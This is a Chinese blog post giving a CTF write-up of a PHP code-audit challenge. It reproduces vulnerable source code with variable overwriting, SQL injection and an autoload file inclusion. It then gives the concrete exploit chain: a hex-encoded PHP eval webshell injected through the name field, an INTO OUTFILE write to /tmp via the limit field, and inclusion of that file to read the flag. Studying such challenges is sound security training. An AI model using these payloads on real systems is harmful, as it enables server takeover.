<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="Manning23"><title>三个白猫抓flag鼠系列1writeup · Manning23</title><meta name="description" content="上周五三个白帽有个ctf的解题游戏，目标是通过代码审计直至获取目标服务器中的flag。这个解题游戏略坑，但是漏洞点在真实环境下都是存在的。所以，越绕越能激发兴趣，总之玩下来还是很开心的，遂于大家分享下全部过程的思路。
题目解析这套题目是由php编写，接近实战。通过做完题目，整理内容后发现，这套题目涉"><meta name="keywords"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">Manning23</a></h3><div class="description"><p>Technology &amp; Life</p></div></div></div><ul class="social-links"><li><a href="http://weibo.com/2077484845"><i class="fa fa-weibo"></i></a></li></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a href="https://www.caicai.me"> CaiCai </a><span>&</span><a href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li></div><div class="information"><div class="back_btn"><li><a onclick="window.history.go(-1)" class="fa fa-chevron-left"> </a></li></div><div class="avatar"><img src="/images/avatar.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>三个白猫抓flag鼠系列1writeup</a></h3></div><div class="post-content"><p>上周五三个白帽有个ctf的解题游戏，目标是通过代码审计直至获取目标服务器中的flag。这个解题游戏略坑，但是漏洞点在真实环境下都是存在的。所以，越绕越能激发兴趣，总之玩下来还是很开心的，遂于大家分享下全部过程的思路。</p>
<h2 id="题目解析"><a href="#题目解析" class="headerlink" title="题目解析"></a>题目解析</h2><p>这套题目是由php编写，接近实战。通过做完题目，整理内容后发现，这套题目涉及的内容还是很多的。</p>
<h3 id="涉及的技术点"><a href="#涉及的技术点" class="headerlink" title="涉及的技术点"></a>涉及的技术点</h3><ul>
<li>1，敏感信息扫描</li>
<li>2，代码审计<ul>
<li>1，可控数据</li>
<li>2，二次注入</li>
<li>3，文件包含</li>
<li>4，变量覆盖</li>
</ul>
</li>
<li>3，Getshell技巧</li>
<li>4，手工读文件</li>
</ul>
<h2 id="思路流程"><a href="#思路流程" class="headerlink" title="思路流程"></a>思路流程</h2><p>起始URL为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http://8ed0a7d1a5ed5b5ac.jie.sangebaimao.com/</div></pre></td></tr></table></figure>
<p>通过穷举URL路径，发现目录存在sangebaimao.zip文件，下载后开始代码审计。</p>
<p><img src="mulu.png" alt=""></p>
<p>通过web功能和代码阅读，发现存在如下功能。</p>
<ul>
<li>注册</li>
<li>登陆</li>
<li>留言</li>
<li>登出</li>
</ul>
<p>阅读注册的代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line"></div><div class="line">include &apos;init.php&apos;;</div><div class="line">if(!empty($username) &amp;&amp; !empty($password) &amp;&amp; !empty($name) &amp;&amp; !empty($limit))</div><div class="line">&#123;</div><div class="line">	$username = htmlspecialchars(filter($username));</div><div class="line">	$password = md5($password);</div><div class="line">	$name = htmlspecialchars(filter($name));</div><div class="line">	$limit = filter($limit);</div><div class="line">	$sql = &quot;select uid from users where username = &apos;$username&apos;&quot;;</div><div class="line">	$result = mysql_query($sql);</div><div class="line">	if($row = mysql_fetch_array($result))</div><div class="line">	&#123;</div><div class="line">		header(&quot;location:register.php&quot;);exit;</div><div class="line">	&#125;</div><div class="line">	$sql = &quot;insert into users(`username`,`password`,`name`,`limit`) values(&apos;$username&apos;,&apos;$password&apos;,&apos;$name&apos;,&apos;$limit&apos;);&quot;;</div><div class="line">	$result = mysql_query($sql);</div><div class="line">	if($result)</div><div class="line">	&#123;</div><div class="line">		header(&quot;location:login.php&quot;);exit;</div><div class="line">	&#125;</div><div class="line">&#125;</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>filter函数为摆设，实际没有功能。因此发现可控参数为</p>
<ul>
<li>username</li>
<li>name</li>
<li>limit</li>
</ul>
<p>阅读init.php内的include.php代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">function __autoload($classname) &#123;</div><div class="line">    $filename = $classname .&quot;.php&quot;;</div><div class="line">    include_once($filename);</div><div class="line">&#125;</div><div class="line">function filter($input)</div><div class="line">&#123;</div><div class="line">	return $input;</div><div class="line">&#125;</div><div class="line">function errorBox($message)</div><div class="line">&#123;</div><div class="line">	echo $message;</div><div class="line">&#125;</div><div class="line">foreach(array(&apos;_GET&apos;,&apos;_POST&apos;,&apos;_COOKIE&apos;) as $key)&#123; </div><div class="line">    foreach($$key as $k =&gt; $v)&#123; </div><div class="line">        if(is_array($v))&#123; </div><div class="line">            errorBox(&quot;hello,sangebaimao!&quot;); </div><div class="line">        &#125;else&#123; </div><div class="line">            $k[0] !=&apos;_&apos;?$$k = addslashes($v):$$k = &quot;&quot;; </div><div class="line">        &#125; </div><div class="line">    &#125; </div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>发现存在__autoload函数，对于获取的参数均过addslashes函数处理，但是由于$$存在，可能存在变量被覆盖的情况。</p>
<p>阅读login.php代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">include &apos;init.php&apos;;</div><div class="line"></div><div class="line">if(!empty($username) &amp;&amp; !empty($password))</div><div class="line">&#123;	</div><div class="line">	</div><div class="line">	$username = filter($username);</div><div class="line">	$password = md5($password);</div><div class="line">	$sql = &quot;select uid,name,`limit` from users where username=&apos;$username&apos; and password=&apos;$password&apos;;&quot;;</div><div class="line">	$result = mysql_query($sql);</div><div class="line">	if($row = mysql_fetch_array($result))</div><div class="line">	&#123;</div><div class="line">		$_SESSION[&apos;uid&apos;] = $row[&apos;uid&apos;];</div><div class="line">		$_SESSION[&apos;users&apos;] = $row[&apos;name&apos;];</div><div class="line">		$_SESSION[&apos;limit&apos;] = $row[&apos;limit&apos;];</div><div class="line">		header(&quot;location:main.php&quot;);exit;</div><div class="line">	&#125;</div><div class="line">	else</div><div class="line">	&#123;</div><div class="line">		header(&quot;location:index.php&quot;);exit;</div><div class="line">	&#125;</div><div class="line">&#125;</div><div class="line">header(&quot;location:index.php&quot;);exit;</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>session会存储人可控参数name和limit。</p>
<p>阅读main.php代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line"></div><div class="line">include &apos;init.php&apos;;</div><div class="line">!$_SESSION[&apos;users&apos;] &amp;&amp; header(&quot;location:index.php&quot;);</div><div class="line"></div><div class="line">$name = $_SESSION[&apos;users&apos;];</div><div class="line">$uid = $_SESSION[&apos;uid&apos;];</div><div class="line">$num = $_SESSION[&apos;limit&apos;];</div><div class="line">$message = htmlspecialchars(filter($message));</div><div class="line">if(class_exists($action))&#123;</div><div class="line">	$sangebaimao = new $action();</div><div class="line">&#125;</div><div class="line"></div><div class="line">if(!empty($message) &amp;&amp; !empty($name))</div><div class="line">&#123;</div><div class="line">	$sql = &quot;insert into guestbook(`uid`,`name`, `message`) values(&apos;&quot;.$uid.&quot;&apos;,&apos;&quot;.$name.&quot;&apos;,&apos;&quot;.$message.&quot;&apos;);&quot;;</div><div class="line">	$result = mysql_query($sql);</div><div class="line">	if($result)</div><div class="line">	&#123;</div><div class="line">		header(&quot;location:main.php&quot;);</div><div class="line">	&#125;</div><div class="line"></div><div class="line">$sql = &quot;select id,name,message from guestbook where uid=&quot;.$uid.&quot; order by id desc limit 0,&quot;.$num.&quot;;&quot;;</div><div class="line">$result = mysql_query($sql);</div><div class="line">&#125;</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>发现insert语句和select语句存在注入，通过变量覆盖进入class_exists方法，触发<strong>autoload函数(class_exists方法被执行时，会自动触发</strong>autoload函数)。</p>
<p><strong>PS：此处是当时做题的一些错误思路。</strong></p>
<ul>
<li>认为header函数后，会跳出，并不执行后面的select语句，其实这个想法是错的，若想跳出，正确的写法是在header函数后加上die函数或者exit函数。</li>
</ul>
<p>至此，整个getshell的思路已经缕清了。</p>
<ul>
<li>通过二次注入写shell。</li>
<li>通过文件包含读shell。</li>
</ul>
<p>但是问题又出来了，我们知道，只有select语句中，才能写shell，并且通过写shell要有union select。可这次的注入点在是在select语句的limit条件后，那么该怎么办呢。经过询问，得到了limit后可以直接拼接 into outfile函数的这一特性。</p>
<p>好了，我们可以写文件了，那么该如何写呢？</p>
<p><strong>先说下当时的错误思路</strong></p>
<p>首先，我们通过注册，可控name参数，但是注册的时候参数有htmlspecialchars转义，因此必须用16进制传入，但是由于</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">$sql = &quot;insert into guestbook(`uid`,`name`, `message`) values(&apos;&quot;.$uid.&quot;&apos;,&apos;&quot;.$name.&quot;&apos;,&apos;&quot;.$message.&quot;&apos;);&quot;;</div><div class="line">$result = mysql_query($sql);</div><div class="line">if($result)&#123;</div><div class="line">	header(&quot;location:main.php&quot;);</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>我陷入了必须使insert语句报错，才能逃出header函数的错误思路。这个错误思路的流程是insert，select。</p>
<p><strong>正确思路</strong></p>
<p>通过name参数，覆盖掉message参数，预期的sql查询语句如下。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">insert into guestbook(`uid`,`name`, `message`) values(&apos;4&apos;,&apos;&apos;,0x3c3f70687020406576616c28245f504f53545b625d293b3f3e)#&apos;,&apos;123&apos;);</div></pre></td></tr></table></figure>
<p>最终整个流程正确的做法是，insert，insert，select。</p>
<p>对了，由于当时web目录不可写，只能向tmp目录写。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">name参数：,0x3c3f70687020406576616c28245f504f53545b625d293b3f3e)#</div><div class="line">limit参数: 1 INTO OUTFILE &apos;/tmp/mtest5.php&apos;</div><div class="line"></div><div class="line">留言,访问shell,利用action进行文件包含</div><div class="line">http://8ed0a7d1a5ed5b5ac.jie.sangebaimao.com/main.php?action=/tmp/mtest5&amp;b=1</div><div class="line"></div><div class="line">通过readfile(&apos;../FlagQWERTYUIOPDFGHJKLPOKJYJDTYJVFTYUJKMN&apos;);读flag。</div></pre></td></tr></table></figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这套题目做下来还是非常有意思的，各个位置的设置考察了不同的内容，也让大家体验了极端情况下的getshell方式。这套题目的环境非常容易搭建，希望有时间大家也玩玩这套题目。代码见附件。</p>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2016-03-23</span><i class="fa fa-tag"></i></div></div></div></div><div class="share"><div class="evernote"><a href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank" class="fa fa-bookmark"></a></div><div class="weibo"><a href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));" class="fa fa-weibo"></a></div><div class="twitter"><a href="http://twitter.com/home?status=,http://yoursite.com/2016/03/23/三个白猫抓flag鼠系列1writeup/,Manning23,三个白猫抓flag鼠系列1writeup,;" class="fa fa-twitter"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a role="navigation" href="/2016/04/06/逻辑回归算法分析与安全场景分析/" title="逻辑回归算法分析与安全场景分析" class="btn">上一篇</a></li><li class="next pagbuttons"><a role="navigation" href="/2015/12/23/Flask-App在生产环境部署/" title="Flask App在生产环境部署" class="btn">下一篇</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>